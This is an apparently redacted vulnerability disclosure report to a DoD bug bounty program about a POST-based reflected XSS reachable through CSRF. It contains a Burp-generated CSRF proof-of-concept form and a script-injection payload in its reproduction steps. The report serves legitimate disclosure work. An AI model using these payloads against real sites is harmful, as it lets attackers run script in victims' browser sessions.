POST based RXSS on https://███████/ via ███ parameter

Good Night DoD team, ##Summary: I have discovered that on the following domain https://██████████/███████ there is Post-Based reflected XSS vulnerability which i can trigger with CSRF (and Clickjacking) due to unsanitized input inside the ███parameter ██████████ ##Description The vulnerable path is: https://███████/███ CSRF html code for you to reproduce: ```javascript <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="https://███████/█████████" method="POST"> <input type="hidden" name="████████" /> <input type="hidden" name="███" /> <input type="hidden" name="█████████" /> <input type="hidden" name="██████████" value="&quot;&gt;&lt;script&gt;alert&#40;document&#46;domain&#41;&lt;&#47;script&gt;" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` ##Steps To Reproduce (As an attacker): 1. Navigate to https://█████████/ 2. Enter arbitrary text on the field and capture the request 3. Capture the request on burp, change the payload on the █████████ field to "><script>alert("XSS by nagli")></script> 4. Craft a CSRF PoC and an alert will pop upon clicking. :-) PoC Video: ██████ ##Best Regards, nagli ## Impact Attacker can execute JS code on the Victim Behalf.